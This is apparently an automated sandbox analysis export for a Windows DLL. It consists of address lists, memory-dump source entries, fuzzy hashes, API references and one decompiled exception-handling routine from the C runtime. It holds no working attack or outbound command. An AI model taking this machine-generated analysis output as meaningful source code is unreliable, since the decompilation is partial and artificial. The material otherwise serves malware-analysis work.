                                                                                                                                                                                                                                                          0x6ddf260e
                                                                                                                                                                                                                                                          0x6ddf2612
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2618
                                                                                                                                                                                                                                                          0x6ddf261b
                                                                                                                                                                                                                                                          0x6ddf261d
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2624
                                                                                                                                                                                                                                                          0x6ddf2626
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2628
                                                                                                                                                                                                                                                          0x6ddf262c
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf262c
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2517
                                                                                                                                                                                                                                                          0x6ddf2517
                                                                                                                                                                                                                                                          0x6ddf2517
                                                                                                                                                                                                                                                          0x6ddf251e
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2520
                                                                                                                                                                                                                                                          0x6ddf2521
                                                                                                                                                                                                                                                          0x6ddf2523
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2523
                                                                                                                                                                                                                                                          0x6ddf254b
                                                                                                                                                                                                                                                          0x6ddf254d
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf255d
                                                                                                                                                                                                                                                          0x6ddf255f
                                                                                                                                                                                                                                                          0x6ddf2561
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2567
                                                                                                                                                                                                                                                          0x6ddf256e
                                                                                                                                                                                                                                                          0x6ddf259a
                                                                                                                                                                                                                                                          0x6ddf259a
                                                                                                                                                                                                                                                          0x6ddf259c
                                                                                                                                                                                                                                                          0x6ddf259e
                                                                                                                                                                                                                                                          0x6ddf25b2
                                                                                                                                                                                                                                                          0x6ddf25b4
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf25a0
                                                                                                                                                                                                                                                          0x6ddf25a0
                                                                                                                                                                                                                                                          0x6ddf25a0
                                                                                                                                                                                                                                                          0x6ddf25a9
                                                                                                                                                                                                                                                          0x6ddf25aa
                                                                                                                                                                                                                                                          0x6ddf25ac
                                                                                                                                                                                                                                                          0x6ddf25ae
                                                                                                                                                                                                                                                          0x6ddf25ae
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf25a0
                                                                                                                                                                                                                                                          0x6ddf2570
                                                                                                                                                                                                                                                          0x6ddf2573
                                                                                                                                                                                                                                                          0x6ddf2575
                                                                                                                                                                                                                                                          0x6ddf2587
                                                                                                                                                                                                                                                          0x6ddf2587
                                                                                                                                                                                                                                                          0x6ddf258a
                                                                                                                                                                                                                                                          0x6ddf258c
                                                                                                                                                                                                                                                          0x6ddf258c
                                                                                                                                                                                                                                                          0x6ddf258d
                                                                                                                                                                                                                                                          0x6ddf258d
                                                                                                                                                                                                                                                          0x6ddf2593
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2577
                                                                                                                                                                                                                                                          0x6ddf2577
                                                                                                                                                                                                                                                          0x6ddf2577
                                                                                                                                                                                                                                                          0x6ddf257e
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2580
                                                                                                                                                                                                                                                          0x6ddf2580
                                                                                                                                                                                                                                                          0x6ddf2581
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2581
                                                                                                                                                                                                                                                          0x6ddf2583
                                                                                                                                                                                                                                                          0x6ddf2585
                                                                                                                                                                                                                                                          0x6ddf2598
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2598
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2585
                                                                                                                                                                                                                                                          0x6ddf24f7
                                                                                                                                                                                                                                                          0x6ddf24fa
                                                                                                                                                                                                                                                          0x6ddf24fd
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf24ff
                                                                                                                                                                                                                                                          0x6ddf2501
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2501
                                                                                                                                                                                                                                                          0x6ddf24c6
                                                                                                                                                                                                                                                          0x6ddf24c8
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6DDF2536
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2850889275-0
                                                                                                                                                                                                                                                          • Opcode ID: 05b23fbef7b0304f96f9681c9bee99fe5ee903fbd0130354ab5bd85ffd0cc180
                                                                                                                                                                                                                                                          • Instruction ID: 89f081abe64153b3c83e6fdfef855b058dc102cf671c9b6aafc49881443465ba
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05b23fbef7b0304f96f9681c9bee99fe5ee903fbd0130354ab5bd85ffd0cc180
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E961D630644683CFE725EF28D9A07697BB5BB8631CF268039F455CB395E770D9438A50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6DE3769F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          • Opcode ID: 089fd7fbdaddb455a317d0c982c3499bb1b7af0ff6127de2a82ff3ddfe6e4787
                                                                                                                                                                                                                                                          • Instruction ID: 74b56d726acb2f54db413b5e0e3d4acf6e6f727c8ce28c54a3f0a1e09faf0930
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 089fd7fbdaddb455a317d0c982c3499bb1b7af0ff6127de2a82ff3ddfe6e4787
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA517EB1E21226CBDB45CF65D5817BAB7F4FB4A325F21842AC415EB340EB75A940CFA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ce257712ed4a12096a10ec0943780987436e576fbe30902e730026d2ea1b974e
                                                                                                                                                                                                                                                          • Instruction ID: f401e0a36067ae8bba4537e1a95b30d3ee86b74a9aad6004dbfd9a7ac06b780e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce257712ed4a12096a10ec0943780987436e576fbe30902e730026d2ea1b974e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 684196B5808219AFDF10DF69DC88AAEB7B8AF55304F2442EDE51DA3200DA359E84CF10
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 728f5d2e3e74e11b59e1a5b28e8f2258d4db469b324d1703b0afbba239a202b0
                                                                                                                                                                                                                                                          • Instruction ID: d14c34dfcccf1a65c7cb7b3924fc3cd6adccf5087f526044afefad6a76b06fd9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 728f5d2e3e74e11b59e1a5b28e8f2258d4db469b324d1703b0afbba239a202b0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D921B373F204394B7B0CC47E8C572BDB6E1D78C501745823AE8A6EA2C1E968D917E2E4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b63038e98ec162acb276a6ef4b551af17aa281bca41f2ba9ce35f7950e122521
                                                                                                                                                                                                                                                          • Instruction ID: 458f7c32f46522300bb294fc2ef0b4c185d67de61d43013002eb6cdce869d03a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b63038e98ec162acb276a6ef4b551af17aa281bca41f2ba9ce35f7950e122521
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711CA23F30C395B675C816D8C1727AA1D2EBD824030F533AD826E72C4F994DE13D290
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                                                          			E6DDF2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                                                                          				signed int* _t43;
                                                                                                                                                                                                                                                          				char _t44;
                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                                                                          				intOrPtr* _t53;
                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                          				void* _t65;
                                                                                                                                                                                                                                                          				long _t66;
                                                                                                                                                                                                                                                          				signed int* _t80;
                                                                                                                                                                                                                                                          				signed int* _t82;
                                                                                                                                                                                                                                                          				void* _t84;
                                                                                                                                                                                                                                                          				signed int _t86;
                                                                                                                                                                                                                                                          				void* _t89;
                                                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                          				_t43 = _t84;
                                                                                                                                                                                                                                                          				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                          				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                          				_t89 = _t95;
                                                                                                                                                                                                                                                          				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                          				_push(_t65);
                                                                                                                                                                                                                                                          				_push(_t84);
                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                          				asm("cld");
                                                                                                                                                                                                                                                          				_t66 = _a8;
                                                                                                                                                                                                                                                          				_t44 = _a4;
                                                                                                                                                                                                                                                          				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                          					_push(_t89);
                                                                                                                                                                                                                                                          					E6DDF23CB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                          					_t46 = 1;
                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                          					_v12 = _t44;
                                                                                                                                                                                                                                                          					_v8 = _a12;
                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                          					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                          					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                          					_t49 = E6DDF2485(_t66);
                                                                                                                                                                                                                                                          					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                          					if(_t49 == 0) {
                                                                                                                                                                                                                                                          						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                          						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                          							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                          							if(_t53 == 0) {
                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                          								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                          								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                          								_t54 =  *_t53();
                                                                                                                                                                                                                                                          								_t89 = _t89;
                                                                                                                                                                                                                                                          								_t86 = _t86;
                                                                                                                                                                                                                                                          								_t66 = _a8;
                                                                                                                                                                                                                                                          								_t55 = _t54;
                                                                                                                                                                                                                                                          								_t106 = _t54;
                                                                                                                                                                                                                                                          								if(_t106 == 0) {
                                                                                                                                                                                                                                                          									goto L8;
                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                          									if(_t106 < 0) {
                                                                                                                                                                                                                                                          										_t46 = 0;
                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                          										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                          										E6DDF2370(_t55, _t66);
                                                                                                                                                                                                                                                          										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                          										E6DDF23CB(_t89, _t66, 0);
                                                                                                                                                                                                                                                          										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                          										E6DDF2467(_t82[2]);
                                                                                                                                                                                                                                                          										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                          										_t66 = 0;
                                                                                                                                                                                                                                                          										_t86 = 0;
                                                                                                                                                                                                                                                          										 *(_t82[2])(1);
                                                                                                                                                                                                                                                          										goto L8;
                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                          							goto L13;
                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                                                          						_t46 = 1;
                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                          				L13:
                                                                                                                                                                                                                                                          				return _t46;
                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                          0x6ddf2268
                                                                                                                                                                                                                                                          0x6ddf2269
                                                                                                                                                                                                                                                          0x6ddf226a
                                                                                                                                                                                                                                                          0x6ddf226d
                                                                                                                                                                                                                                                          0x6ddf226f
                                                                                                                                                                                                                                                          0x6ddf2272
                                                                                                                                                                                                                                                          0x6ddf2273
                                                                                                                                                                                                                                                          0x6ddf2275
                                                                                                                                                                                                                                                          0x6ddf2276
                                                                                                                                                                                                                                                          0x6ddf2277
                                                                                                                                                                                                                                                          0x6ddf227a
                                                                                                                                                                                                                                                          0x6ddf2284
                                                                                                                                                                                                                                                          0x6ddf2335
                                                                                                                                                                                                                                                          0x6ddf233c
                                                                                                                                                                                                                                                          0x6ddf2345
                                                                                                                                                                                                                                                          0x6ddf228a
                                                                                                                                                                                                                                                          0x6ddf228a
                                                                                                                                                                                                                                                          0x6ddf2290
                                                                                                                                                                                                                                                          0x6ddf2296
                                                                                                                                                                                                                                                          0x6ddf2299
                                                                                                                                                                                                                                                          0x6ddf229c
                                                                                                                                                                                                                                                          0x6ddf22a0
                                                                                                                                                                                                                                                          0x6ddf22a5
                                                                                                                                                                                                                                                          0x6ddf22aa
                                                                                                                                                                                                                                                          0x6ddf232a
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf22ac
                                                                                                                                                                                                                                                          0x6ddf22ac
                                                                                                                                                                                                                                                          0x6ddf22b8
                                                                                                                                                                                                                                                          0x6ddf22ba
                                                                                                                                                                                                                                                          0x6ddf2315
                                                                                                                                                                                                                                                          0x6ddf2315
                                                                                                                                                                                                                                                          0x6ddf231b
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf22bc
                                                                                                                                                                                                                                                          0x6ddf22cb
                                                                                                                                                                                                                                                          0x6ddf22cd
                                                                                                                                                                                                                                                          0x6ddf22ce
                                                                                                                                                                                                                                                          0x6ddf22cf
                                                                                                                                                                                                                                                          0x6ddf22d2
                                                                                                                                                                                                                                                          0x6ddf22d2
                                                                                                                                                                                                                                                          0x6ddf22d4
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf22d6
                                                                                                                                                                                                                                                          0x6ddf22d6
                                                                                                                                                                                                                                                          0x6ddf2320
                                                                                                                                                                                                                                                          0x6ddf22d8
                                                                                                                                                                                                                                                          0x6ddf22d8
                                                                                                                                                                                                                                                          0x6ddf22dc
                                                                                                                                                                                                                                                          0x6ddf22e4
                                                                                                                                                                                                                                                          0x6ddf22e9
                                                                                                                                                                                                                                                          0x6ddf22ee
                                                                                                                                                                                                                                                          0x6ddf22fa
                                                                                                                                                                                                                                                          0x6ddf2302
                                                                                                                                                                                                                                                          0x6ddf2309
                                                                                                                                                                                                                                                          0x6ddf230f
                                                                                                                                                                                                                                                          0x6ddf2313
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf2313
                                                                                                                                                                                                                                                          0x6ddf22d6
                                                                                                                                                                                                                                                          0x6ddf22d4
                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                          0x6ddf22ba
                                                                                                                                                                                                                                                          0x6ddf232e
                                                                                                                                                                                                                                                          0x6ddf232e
                                                                                                                                                                                                                                                          0x6ddf232e
                                                                                                                                                                                                                                                          0x6ddf22aa
                                                                                                                                                                                                                                                          0x6ddf234a
                                                                                                                                                                                                                                                          0x6ddf2351

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480776328.000000006DDF1000.00000020.00020000.sdmp, Offset: 6DDF0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480766161.000000006DDF0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480789489.000000006DDF3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480806564.000000006DDF5000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.480822787.000000006DDF6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                          • Instruction ID: e2ea86dd4c427ba7085dadaacdeab055b8395765ab6d22d60d57d0ea900c1744
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2219572904245ABC710EF68C8809A7BBE5BF49354B478158E955DB246D730F916C7E0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.481447571.000000006DE71000.00000040.00020000.sdmp, Offset: 6DE71000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                                                                          • Instruction ID: eac48d5508d5e343a0e88211251994f6381969c646acbf68ad7c0285f9c87662
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F11D3733402009FD768DE99DC91EA273EAFF89234B25816AED08CB311DB35E802C760
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.481447571.000000006DE71000.00000040.00020000.sdmp, Offset: 6DE71000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                          • Instruction ID: e1446809198cd7f249c2c9ba03cc9900d008d536c6c8e60762495baf3ada546d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801C0363142429FD77ACA29D984D79B7E8FBD1724B25C07EC5468B716D620E942CA20
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bebc977af7d34d5d22399dccb5525bf99a1a508f202cdd2d67311cd910c47a08
                                                                                                                                                                                                                                                          • Instruction ID: 01ae4cf2b745c8ece06bc1eac1c90c79c0e6e19f51c58c678d1c48215fe72176
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bebc977af7d34d5d22399dccb5525bf99a1a508f202cdd2d67311cd910c47a08
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DEE08C33911228EBCB11CBC9D900A8AB3ECEB85A44B2180AAB615E3210C770DE00C7D0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6DE4297E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456CE
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456E0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE456F2
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45704
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45716
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45728
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4573A
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4574C
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE4575E
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45770
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45782
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE45794
                                                                                                                                                                                                                                                            • Part of subcall function 6DE456B1: _free.LIBCMT ref: 6DE457A6
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42973
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: HeapFree.KERNEL32(00000000,00000000,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?), ref: 6DE3D6A0
                                                                                                                                                                                                                                                            • Part of subcall function 6DE3D68A: GetLastError.KERNEL32(?,?,6DE45842,?,00000000,?,6DE70096,?,6DE45869,?,00000007,?,?,6DE42AD1,?,?), ref: 6DE3D6B2
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42995
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429AA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429B5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429D7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429EA
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE429F8
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A03
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A3B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A42
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A5F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6DE42A77
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.480847800.000000006DDFE000.00000020.00020000.sdmp, Offset: 6DDFE000, based on PE: false
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction ID: 62937f88dd65bbaf75270fac1dbc8802996cfce4dc97a32381c655e6db36b1e5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bc5d7dabc40d387ff5b54aff10c1e47f8e9c51b520f6bb14d3579fc390057cf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D315B31608602AEEB308A35E844B7A77E8BF50358F72852DE96DE6250DF31E860DB14
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE395CB
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6DE395F2
                                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6DE396FE
                                                                                                                                                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 6DE39753
                                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6DE397D9
                                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6DE39860
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6DE3987B
                                                                                                                                                                                                                                                          Strings
